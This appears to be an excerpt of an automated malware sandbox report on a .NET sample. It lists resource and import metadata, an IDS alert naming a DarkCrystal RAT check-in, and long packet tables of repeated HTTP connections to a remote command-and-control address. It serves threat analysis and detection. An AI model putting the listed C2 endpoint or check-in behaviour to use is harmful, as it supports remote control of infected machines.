RT_ICON | 0x7ac698 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | | | 0.1918032786885246
RT_ICON | 0x7ad020 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 0 | | | 0.2779069767441861
RT_ICON | 0x7ad6d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.30939716312056736
RT_GROUP_ICON | 0x7adb40 | 0x76 | data | | | 0.7457627118644068
RT_VERSION | 0x7a2280 | 0x244 | data | | | 0.46551724137931033
RT_MANIFEST | 0x7adbb8 | 0x10d0 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text | | | 0.40892193308550184
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-01T05:57:31.855707+0200 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.6 | 49706 | 37.44.238.250 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Oct 1, 2024 05:57:50.602683067 CEST4972680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:50.728287935 CEST4972680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:50.729043961 CEST4972780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:50.733536959 CEST804972637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:50.733673096 CEST4972680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:50.733849049 CEST804972737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:50.733905077 CEST4972780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:50.734035015 CEST4972780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:50.738833904 CEST804972737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:51.090190887 CEST4972780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:51.095252991 CEST804972737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:51.341443062 CEST804972737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:51.469230890 CEST804972737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:51.470710993 CEST4972780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:51.633589029 CEST4972980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:51.639797926 CEST804972937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:51.639939070 CEST4972980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:51.640049934 CEST4972980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:51.645895958 CEST804972937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:51.996505976 CEST4972980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:52.002407074 CEST804972937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:52.019671917 CEST4972780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:52.543951988 CEST804972937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:52.544123888 CEST804972937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:52.544197083 CEST804972937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:52.544291019 CEST4972980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:52.890327930 CEST4972980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:52.897674084 CEST804972937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:52.898729086 CEST4972980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.094702959 CEST4973080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.100424051 CEST804973037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.102255106 CEST4973080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.102478981 CEST4973080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.107234955 CEST804973037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.225095034 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.225471020 CEST4973080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.230005026 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.230082035 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.230252028 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.234988928 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.270405054 CEST804973037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.374399900 CEST4973280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.379321098 CEST804973237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.380654097 CEST4973280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.380731106 CEST4973280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.386831045 CEST804973237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.556700945 CEST804973037.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.562725067 CEST4973080192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.574687958 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.581024885 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.581038952 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.581047058 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.581054926 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.581063032 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.581172943 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.582042933 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.582051992 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.582092047 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.582099915 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.582099915 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.582130909 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.582144022 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.586667061 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.586675882 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.586697102 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.586704016 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.586725950 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.586726904 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.586760998 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.586772919 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.587763071 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.587774038 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.587814093 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.630410910 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.630846024 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.664146900 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.666790009 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.671708107 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671716928 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671726942 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671739101 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671783924 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671787977 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.671792030 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671797991 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671807051 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.671865940 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.671935081 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671943903 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671947002 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671953917 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671961069 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.671968937 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.672008991 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.672009945 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.672017097 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.672022104 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.672025919 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.672066927 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.672112942 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.672135115 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.672179937 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.677565098 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.677580118 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.677719116 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.677726984 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.677822113 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.677829981 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.677901983 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.677927017 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.730943918 CEST4973280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.735968113 CEST804973237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.833775043 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:53.886972904 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:53.988357067 CEST804973237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.043343067 CEST4973280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.117408037 CEST804973237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.168247938 CEST4973280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.244689941 CEST4973280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.245274067 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.249948025 CEST804973237.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.250000954 CEST4973280192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.250116110 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.250185013 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.250392914 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.255127907 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.491976023 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.543220043 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.606724977 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.611785889 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.856756926 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.871825933 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.872523069 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.876976967 CEST804973137.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.877043962 CEST4973180192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.877399921 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.877463102 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.877588034 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.882366896 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:54.902616978 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:54.989316940 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.043240070 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.177248001 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.177936077 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.182365894 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.182475090 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.182746887 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.182812929 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.182926893 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.230986118 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.480750084 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.493230104 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.493421078 CEST4973380192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.494029999 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.494043112 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.494246960 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.494354010 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.494365931 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.498275042 CEST804973337.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.531740904 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.536612034 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.543239117 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:55.741503000 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:55.793260098 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.113842010 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.168247938 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.246516943 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.293231964 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.371745110 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.371830940 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.372453928 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.376859903 CEST804973437.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.376912117 CEST4973480192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.377177000 CEST804973537.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.377218008 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.377226114 CEST4973580192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.377274990 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.377403021 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.383665085 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.731025934 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:56.736202955 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:56.982575893 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.027709961 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.108823061 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.110002995 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.115272045 CEST804973637.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.115336895 CEST4973680192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.229127884 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.234083891 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.234164000 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.234302044 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.239144087 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.590303898 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.595324039 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.859369040 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:57.902755022 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:57.992934942 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:58.043239117 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.167331934 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.214831114 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.447096109 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:58.447232008 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.447370052 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.447798014 CEST804973737.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:58.447947979 CEST4973780192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.452105999 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:58.793350935 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:58.798511028 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.053325891 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.105839968 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.181299925 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.230722904 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.304416895 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.305092096 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.309638023 CEST804973837.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.309705973 CEST4973880192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.309978008 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.310051918 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.310153008 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.314894915 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.668317080 CEST4973980192.168.2.637.44.238.250
                                                          Oct 1, 2024 05:57:59.673325062 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.934602022 CEST804973937.44.238.250192.168.2.6
                                                          Oct 1, 2024 05:57:59.980731010 CEST4973980192.168.2.637.44.238.250
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2024 05:58:00.069160938 CEST | 80 | 49739 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.121382952 CEST | 49739 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.196357965 CEST | 49739 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.197057962 CEST | 49740 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.201647043 CEST | 80 | 49739 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.201745987 CEST | 49739 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.201865911 CEST | 80 | 49740 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.201931000 CEST | 49740 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.202050924 CEST | 49740 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.206770897 CEST | 80 | 49740 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.560297012 CEST | 49740 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.565293074 CEST | 80 | 49740 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.759129047 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.762917995 CEST | 49740 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.764240026 CEST | 80 | 49741 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.764344931 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.764462948 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.768079042 CEST | 80 | 49740 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.768146992 CEST | 49740 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.769237041 CEST | 80 | 49741 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.881443024 CEST | 49742 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.886398077 CEST | 80 | 49742 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:00.886490107 CEST | 49742 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.886586905 CEST | 49742 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:00.891362906 CEST | 80 | 49742 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.121498108 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.152592897 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.230814934 CEST | 49742 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.259615898 CEST | 80 | 49741 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.259665012 CEST | 80 | 49741 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.259696007 CEST | 80 | 49741 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.259723902 CEST | 80 | 49742 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.376286983 CEST | 80 | 49741 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.418235064 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.491219997 CEST | 80 | 49742 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.508830070 CEST | 80 | 49741 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.543246984 CEST | 49742 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.558851957 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.625001907 CEST | 80 | 49742 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.668267965 CEST | 49742 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.741931915 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.742002964 CEST | 49742 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.742691994 CEST | 49743 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.747117043 CEST | 80 | 49741 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.747180939 CEST | 49741 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.747422934 CEST | 80 | 49742 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.747471094 CEST | 49742 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.747540951 CEST | 80 | 49743 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:01.747612000 CEST | 49743 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.747724056 CEST | 49743 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:01.752469063 CEST | 80 | 49743 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:02.105789900 CEST | 49743 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:02.110774994 CEST | 80 | 49743 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:02.362976074 CEST | 80 | 49743 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:02.418366909 CEST | 49743 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:02.531914949 CEST | 80 | 49743 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:02.574482918 CEST | 49743 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:02.648426056 CEST | 49744 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:02.653434992 CEST | 80 | 49744 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:02.653527975 CEST | 49744 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:02.653613091 CEST | 49744 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:02.658415079 CEST | 80 | 49744 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:03.032437086 CEST | 49744 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.038012028 CEST | 80 | 49744 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:03.280139923 CEST | 80 | 49744 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:03.324532032 CEST | 49744 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.417182922 CEST | 80 | 49744 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:03.465114117 CEST | 49744 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.541805029 CEST | 49743 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.551148891 CEST | 49744 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.551820993 CEST | 49745 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.556611061 CEST | 80 | 49745 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:03.556674957 CEST | 49745 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.556848049 CEST | 49745 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.557511091 CEST | 80 | 49744 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:03.557552099 CEST | 49744 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.561614037 CEST | 80 | 49745 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:03.902724028 CEST | 49745 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:03.907650948 CEST | 80 | 49745 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:04.215714931 CEST | 80 | 49745 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:04.261991978 CEST | 49745 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:04.288882017 CEST | 80 | 49745 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:04.340092897 CEST | 49745 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:04.439256907 CEST | 49745 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:04.440200090 CEST | 49746 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:04.444724083 CEST | 80 | 49745 | 37.44.238.250 | 192.168.2.6
Oct 1, 2024 05:58:04.444770098 CEST | 49745 | 80 | 192.168.2.6 | 37.44.238.250
Oct 1, 2024 05:58:04.444946051 CEST | 80 | 49746 | 37.44.238.250 | 192.168.2.6
